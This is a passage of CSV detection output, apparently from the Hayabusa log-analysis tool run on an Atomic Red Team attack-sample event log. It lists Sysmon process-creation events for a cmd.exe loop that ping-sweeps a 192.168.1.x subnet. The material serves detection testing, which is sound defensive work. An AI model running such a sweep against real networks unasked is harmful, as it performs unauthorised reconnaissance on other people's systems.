""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:13.509 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.198 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:14.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.199 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:14.513 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.200 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:15.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.201 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:15.518 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.202 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:16.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.203 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:16.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.204 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:17.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.205 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:17.438 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.206 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:18.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.207 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:18.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.208 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:19.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.209 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:19.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.210 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:20.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.211 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:20.571 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.212 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:21.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.213 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:21.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.214 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:22.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.215 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:22.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.216 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:23.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.217 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:23.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.218 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:23.993 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.219 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:24.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.220 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:25.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.221 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:25.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.222 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:26.004 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.223 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:26.430 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.224 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:27.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.225 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:27.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.226 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:28.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.227 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:28.511 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.228 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:29.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.229 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:29.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.230 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:30.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.231 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:30.521 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.232 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:31.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.233 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:31.530 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.234 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:32.058 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.235 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:32.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.236 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:33.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.237 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:33.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.238 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:34.005 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.239 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:34.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.240 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:35.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.241 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:35.559 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.242 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:36.025 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.243 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:36.536 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.244 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:37.012 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.245 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:37.505 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.246 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:38.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.247 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:38.588 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.248 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:39.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.249 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:39.518 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.250 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:40.006 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.251 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:40.535 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.252 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 